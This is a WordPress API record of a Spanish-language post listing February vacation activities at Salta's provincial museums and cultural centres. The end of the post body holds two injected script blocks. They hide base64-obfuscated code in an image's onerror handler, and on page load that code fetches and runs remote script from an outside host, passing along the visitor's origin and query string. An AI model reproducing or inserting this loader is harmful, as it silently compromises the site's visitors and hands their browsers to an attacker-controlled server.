{"id":3614,"date":"2024-02-05T10:26:23","date_gmt":"2024-02-05T13:26:23","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3614"},"modified":"2025-08-14T00:01:23","modified_gmt":"2025-08-14T03:01:23","slug":"segui-disfrutando-vacaciones-en-cultura-en-museos-conectados-y-centros-culturales","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3614","title":{"rendered":"Segu\u00ed disfrutando Vacaciones en Cultura en Museos Conectados y Centros Culturales"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-c310bdbfd22e509bd7c04cbad9c95194\" style=\"background-color:#c42a6d\"><em>Los museos y centros culturales provinciales ofrecen una amplia gama de actividades para aprovechar en vacaciones.<\/em><\/h3>\n\n\n\n<p>Hasta el domingo 25 de febrero inclusive, la entrada a todos los museos provinciales es gratuita para salte\u00f1os, salte\u00f1as y residentes en Salta.<\/p>\n\n\n\n<p><strong>Cronograma FEBRERO \/ Museos Conectados y Centros Culturales &nbsp;<\/strong><\/p>\n\n\n\n<p><strong>MUSEOS<\/strong><\/p>\n\n\n\n<p><strong>Museo de la Vid y el Vino de Cafayate&nbsp;<\/strong>(Calle G\u00fcemes Sur esquina Ferm\u00edn Perdiguero, Cafayate)<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Peque\u00f1os Guardianes: De martes a domingo, de 9 a 18 hs &#8211; Ingreso libre y gratuito a menores de 12 a\u00f1os.<\/p>\n\n\n\n<p>Destinado a ni\u00f1os y la familia en general, se trata de un juego autogestionado con pistas. Consiste en descubrir los 12 animales de los museos de la APP Guardianes del Paisaje, ocultos en las salas y otros juegos para seguir aprendiendo sobre los nombres de los animalitos.<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Plaza Guardianes del Paisaje: De martes a domingo, de 9 a 18 hs \u2013 Ingreso libre y gratuito.<\/p>\n\n\n\n<p>Destinado a ni\u00f1os y familia en general, se trata de una plaza de juegos para seguir aprendiendo y descubriendo sobre los h\u00e1bitos y habilidades de los 12 animalitos ic\u00f3nicos de los Museos de la provincia.<\/p>\n\n\n\n<p><strong>Museo Arqueol\u00f3gico Pio Pablo D\u00edaz de Cachi<\/strong>&nbsp;(Juan Calchaqu\u00ed s\/n, Cachi)<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Patio de juegos:&nbsp; De martes a domingo, de 9 a 16 hs. Entrada gratuita. Destinado a ni\u00f1os y familia en general, se trata de un patio de juegos que, al estilo del tradicional juego de \u00abescaleras y serpientes\u00bb, requiere que los participantes arrojen dados y avancen por los casilleros. Algunas casillas proporcionan acertijos que deben resolverse para avanzar. El prop\u00f3sito de este juego es despertar la curiosidad acerca de los datos del museo, la informaci\u00f3n hist\u00f3rica de Cachi y los animales presentes en la exhibici\u00f3n del museo.<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Curiosidades de la arqueolog\u00eda en los Valles: De martes a domingo, de 9 a 16 hs. Actividad gratuita con la entrada al Museo. La actividad comprende una exposici\u00f3n rotativa con el objetivo de destacar los sitios de la zona. Esto se lograr\u00e1 mediante la exhibici\u00f3n de piezas que no forman parte de la sala permanente pero que est\u00e1n incluidas en la colecci\u00f3n del museo, junto con fotograf\u00edas de los propios sitios.<\/p>\n\n\n\n<p><strong>Complejo Museol\u00f3gico Explora Salta (Caseros 701, Salta Capital)<\/strong><\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\u201cLa Memoria del Agua\u201d muestra de cer\u00e1mica de Pilar Mari: Martes a Domingo&nbsp; y Feriados, de 10 a 20 hs, hasta el 4 de Febrero. Entrada gratuita.<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Talleres Gratuitos \u00abMirar mi mundo\u201d , taller de sensibilizaci\u00f3n a la fotograf\u00eda en la sala Construyendo Libertades. Domingos 4 y 25 de febrero, de 10.30 a 12.30. Entrada gratuita con reserva previa&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br>Se&nbsp; propone un recorrido a la muestra&nbsp; 34\u00ba Muestra Anual de fotoperiodismo argentino y luego de lo observado reflexionar sobre su barrio, su club, su colonia en detener la mirada en el territorio que habitamos. Pensar su entorno en im\u00e1genes, para fotografiar hay que mirar, propondremos hacer fotos, visibilizando y fomentando el entramado afectivo que cada persona tiene de su entorno. Luego se les dar\u00e1 la consigna de ir a sus lugares y fotografiar algo que represente su \u00abmundo\u00bb, y sus actividades. En formato digital, les pediremos que nos las env\u00eden, para hacer un mural impreso en el museo. Tambi\u00e9n se podr\u00e1n compartir en las redes del museo. Se les pedir\u00e1 tambi\u00e9n que piensen un ep\u00edgrafe para la foto.<br><br>Se realizar\u00e1n 2\u00aa encuentro, uno en el mes de febrero y el otro encuentro en el mes de marzo se invitar\u00eda a los ni\u00f1os, adolescentes y adulto a compartir su experiencia sobre el taller. Se invitara a un fot\u00f3grafo\/a salte\u00f1o\/a, a dar una charla y&nbsp; pondr\u00e1n una puesta en com\u00fan la mirada de su mundo y su experiencia.<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Muestra \u00abArmon\u00eda portable\u00bb, &nbsp;piezas escult\u00f3ricas de la artista Cecilia Azniv Lutufyan, con curadur\u00eda de Roxana Ramos.&nbsp; Inauguraci\u00f3n: viernes 9 de febrero, vigente hasta el 15 de abril. Entrada gratuita.<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Taller pago: Dibujo de Mitos y Leyendas de verano 2024, a cargo del Prof. Felipe Mendoza \u2013 S\u00e1bados de&nbsp; 10.30 a 13. Modalidad de pago: $3.000 por mes, incluye materiales. Destinado a ni\u00f1os a partir de los 8 a\u00f1os en adelante&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<br><br><strong>Museo de Bellas Artes de Salta (Av. Belgrano 992, Salta Capital)<\/strong><\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Sal\u00f3n Provincial XLIII (2023), De martes a domingo, de 10 a 20 hs. Entrada gratuita. Obras de artistas locales, seleccionadas y premiadas por la provincia.<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Muestra permanente, De martes a domingo, de 10 a 20 hs. Entrada gratuita. Obras del siglo XVII al siglo XX.<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\u201cTaller de Dibujo Y Pintura\u201d para adolescentes y adultos, mi\u00e9rcoles de 16 a 19 y jueves de 17 a 20 hs.&nbsp; Con costo. Destinado a p\u00fablico en general. Docente:&nbsp;&nbsp;Fernando Belton 011-65597202.<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Encuentro de personas no videntes. Viernes 2 de febrero, de 18 a 20 hs. Entrada gratuita.<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Taller de acuarela para j\u00f3venes y adultos. Martes de febrero, de 16 a 18 hs. Con costo, destinado al p\u00fablico en general. Docente:&nbsp;Paola Soto &#8211; contacto 3876196349<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Taller de Vitro Fusi\u00f3n para adultos. Martes de febrero, de 10 a 12 hs. Con costo, destinado al p\u00fablico general. Docente:&nbsp; Graciela Ocampo &#8211; contacto 3874194927<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Taller de arte en vacaciones, M\u00e1scaras del Cabur\u00e9. Mi\u00e9rcoles y jueves, 10 a 11.30 hs. GRATIS, para ni\u00f1os de 5 a 11 a\u00f1os.&nbsp; Docente: Fernanda Gonz\u00e1lez<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Visitas guiadas por la muestra de la Colecci\u00f3n Permanente. Viernes 12 al 29 de marzo, 12 y 18 hs.<\/p>\n\n\n\n<p><strong>Museo de Arte Contempor\u00e1neo \u2013 MAC (Zuvir\u00eda 90, Salta Capital)<\/strong><\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Taller de arte creativo para ni\u00f1os. Mi\u00e9rcoles, de 18.30 a 20 hs. Gratuito. Taller de arte creativo organizado por el \u00e1rea educativa del MAC. incluye materiales.<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Muestra Proyecto Institucional Colecciones y Coleccionistas &#8211; 2da Edici\u00f3n. MANDINO LUIS ESCODA. \/ PROYECTO VACA &#8211; GUSTAVO REYES \u2013 De martes a domingo, entrada gratuita.&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Inauguraci\u00f3n s\u00e1bado 3, 20 hs: Los Colores de la Tierra de Enzo Cacciola. Entrada Gratuita. P\u00fablico en general.&nbsp;<\/p>\n\n\n\n<p><strong>Museo G\u00fcemes (Espa\u00f1a 730, Salta Capital)<\/strong><\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Colonia de Vacaciones con G\u00fcemes \u2013 S\u00e1bado 3, de 17.30 a 19 hs. Sin costo. Ni\u00f1os a partir de 4 a\u00f1os. Para m\u00e1s informaci\u00f3n, contactar personalmente en Espa\u00f1a 730 &#8211; Salta Capital, al tel\u00e9fono (0387) 495-4295 o por mail a:&nbsp;info@museoguemes.gob.ar<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Gu\u00edas Interactivas para ni\u00f1os. Mi\u00e9rcoles de febrero, de &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 11 a 19 hs. Distribuci\u00f3n sin costo en la Recepci\u00f3n del Museo, para visitantes desde los 6 a\u00f1os.<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Domingos de Abuelos y Nietos en el Museo G\u00fcemes. Domingos de febrero, de11 a 19 hs- Sin costo para salte\u00f1os y residentes en Salta. Invitamos a todos los abuelos a compartir un domingo diferente junto a sus nietos. En esta oportunidad, a la visita regular en forma gratuita par los salte\u00f1os y residentes en Salta, se sumar\u00e1 la entrega de juegos impresos vinculados a G\u00fcemes, con el fin de que sigan compartiendo momentos de distensi\u00f3n entre abuelos y nietos, luego de la visita.<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Taller did\u00e1ctico de Folklore \u00abCoquena\u00bb. Viernes 23 de febrero, de 17 a 19 hs. Sin costo para ni\u00f1os a partir de 3 a\u00f1os.<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Celebrando a G\u00fcemes: 8 de febrero, de 9.30 a 11 hs y de 14.30 a 17 hs. Sin costo. A 239 a\u00f1os del natalicio del General.&nbsp; Celebraremos su llegada a este mundo junto a los m\u00e1s peque\u00f1os a partir de una propuesta l\u00fadico-recreativa donde distintas colonias con reserva previa, participar\u00e1n para vivir una experiencia s\u00faper original. Para m\u00e1s informaci\u00f3n, contactar personalmente en Espa\u00f1a 730 &#8211; Salta Capital, al tel\u00e9fono (0387) 495-4295 o por mail a:&nbsp;info@museoguemes.gob.ar<\/p>\n\n\n\n<p><strong>Museo de Antropolog\u00eda de Salta \u2013 MAS (Ej\u00e9rcito del Norte y Ricardo Sol\u00e1)<\/strong><\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\u00abLa Gran Aventura del Pasado en el MAS\u00bb. Talleres de vacaciones de verano para ni\u00f1os. Jueves 8 y jueves 22, a las 17 hs. &nbsp;&nbsp; Sin costo. A ni\u00f1os de 6 a 11 a\u00f1os, se les propone un taller de elaboraci\u00f3n de m\u00e1scaras teniendo en cuenta la posibilidad de vivir dicha experiencia a partir de la observaci\u00f3n de las presentes en las diferentes colecciones que presenta el Museo.<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Visita Guiada Nocturna. Viernes 2, 9, 16 y 23, 19 hs. Sin costo. Al p\u00fablico en general, se propone un recorrido guiado especial por las salas del museo, culminando en la terraza, transitando por los m\u00e1s de 10,000 a\u00f1os de historia que representa la presencia humana en nuestra provincia. Con cupo limitado. Inscripciones al 4222960<\/p>\n\n\n\n<p><strong>Museo Quinquela Mart\u00edn de Rosario de la Frontera (San Mart\u00edn N\u00ba 456 &#8211; Rosario de la Frontera)<\/strong><\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Capacitaci\u00f3n Danzas folcl\u00f3ricas. S\u00e1bado 24, de 9 a 11 y de 11 a 13 hs. Entrada gratuita. Teatro Municipal Gral. G\u00fcemes y salas del Museo. Destinatarios: Mayores de &nbsp;13 a\u00f1os<\/p>\n\n\n\n<p><strong>Museo de Ciencias Naturales y el Petr\u00f3leo Parodi Bustos de Campamento Vespucio<\/strong>&nbsp;(&nbsp;Av. San Martin, A4563 Campamento Vespucio)<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Visitas guiadas.&nbsp;Martes a domingos, de 9 a 17 hs. Sin costo.<\/p>\n\n\n\n<p><strong>Museo de Arqueolog\u00eda de Alta Monta\u00f1a \u2013 MAAM (Mitre 77)<\/strong><\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Todo el mes, Sala de los cardones: Muestra Cient\u00edfica, Cultural y Educativa \u00abPrograma de Conservaci\u00f3n C\u00f3ndor Andino\u00bb.<\/p>\n\n\n\n<p><strong>Sitio Arqueol\u00f3gico Esteco II (A 8 km de R\u00edo Piedras, por Ruta Nacional N\u00b04)&nbsp;&nbsp;&nbsp;&nbsp;<\/strong><\/p>\n\n\n\n<p>&#8211;&nbsp; &nbsp; &nbsp; &nbsp; Visitas guiadas.Martes a domingos, de 8 a 18 hs. Gratuito. Municipio de R\u00edo Piedras&nbsp;&nbsp;&nbsp;&nbsp; P\u00fablico en general.Visitas guiadas en el Sitio Arqueologico y en el Area de reserva para tener una visi\u00f3n m\u00e1s global de la historia y los sucesos acaecidos en la Ciudad Colonial Nuestra Se\u00f1ora de Talavera de Madrid fundada en el a\u00f1o 1609 y abandonada en el a\u00f1o 1692.<\/p>\n\n\n\n<p><strong>CENTROS CULTURALES<\/strong><\/p>\n\n\n\n<p>Centro Cultural Am\u00e9rica (Mitre 23, Salta Capital)<\/p>\n\n\n\n<p>&#8211;&nbsp;Taller de Danza Terapia. Mi\u00e9rcoles 8, de 9.30 a 11.30 hs. Gratuito., para adultos mayores y p\u00fablico en general.<\/p>\n\n\n\n<p>Centro&nbsp; Cultural de los Pueblos Originarios (Alberdi esq. G\u00fcemes, Tartagal)<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;Curso de Computaci\u00f3n.&nbsp;Martes a viernes, de 10 a 12 hs y de&nbsp; 16 a 18 hs. Gratuito para mayores de 18 a\u00f1os.<\/p>\n\n\n\n<p>&#8211;&nbsp;&nbsp;Visitas guiadas. De martes a s\u00e1bados, de 9 a 21 hs. Sin costo, para p\u00fablico en general.<\/p>\n\n\n\n<p>&#8211;&nbsp; Taller de Movimiento creativo. Martes 6, 13, 20 y 27, &nbsp;19 a 21 hs. Gratuito. Docente: &nbsp;Carolina Bustillos.<\/p>\n\n\n\n<p>&#8211; Taller: Posibilidades y contexto para emprender. Jueves 1,&nbsp; 18.30 hs. Gratuito. Docente: &nbsp;Carlos Leiva.<\/p>\n\n\n\n<p>&#8211; Taller b\u00e1sico de Lengua Wichi. S\u00e1bados 10, 17, 24 de febrero y 2 de marzo, de 10 a 12. Con costo. Destinado a adultos. Docente: &nbsp;Dem\u00f3stenes Toribio.<\/p>\n\n\n\n<p>&#8211; Taller de Artes Manuales. Martes, de 18 a 20 hs. Destinado a adultos. Docente: &nbsp;Vanesa Leguina. Con costo.<\/p>\n\n\n\n<p>&#8211; Taller de Teatro para adultos. S\u00e1bados, de &nbsp;19 a 20.30. Docente: Lorena Tesei. Con costo.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/segui-disfrutando-vacaciones-en-cultura-en-museos-conectados-y-centros-culturales-94052\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Los museos y centros culturales provinciales ofrecen una amplia gama de actividades para aprovechar en vacaciones. Hasta el domingo 25 de febrero inclusive, la entrada a todos los museos provinciales es gratuita para salte\u00f1os, salte\u00f1as y residentes en Salta. Cronograma FEBRERO \/ Museos Conectados y Centros Culturales &nbsp; MUSEOS Museo de la Vid y el [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3615,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,9],"tags":[],"class_list":{"0":"post-3614","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-museos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3614"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3614"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3614\/revisions"}],"predecessor-version":[{"id":6863,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3614\/revisions\/6863"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3615"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3614"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3614"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3614"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}